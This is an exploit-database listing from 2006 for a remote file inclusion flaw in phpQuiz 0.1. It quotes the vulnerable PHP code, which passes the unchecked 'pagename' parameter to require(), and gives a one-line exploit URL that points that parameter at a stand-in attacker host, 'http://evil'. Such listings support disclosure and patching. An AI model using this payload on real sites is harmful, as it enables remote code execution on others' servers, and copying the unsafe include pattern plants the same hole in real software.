[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpQuiz 0.1 (pagename) Remote File Include Vulnerability

Author
Solpot
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-832
Category
web applications
Date add
13-09-2006
Platform
unsorted
========================================================
phpQuiz 0.1 (pagename) Remote File Include Vulnerability
========================================================



#############################SolpotCrew Community################################
#
#  phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion
#
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (14-09-2006)
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#
###############################################################################
Input passed to the "pagename" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources. 
code from index.php
<?php
 //include global variables.
 include('global.inc.php');
 if (empty($pagename)) $pagename=main_menu;
 require ("$pagename.php");
?>
exploit : http://somehost/path_to_phpQuiz/index.php?pagename=http://evil
##############################MY LOVE JUST FOR U RIE######################### 
######################################E.O.F################################## 




#  0day.today [2024-12-25]  #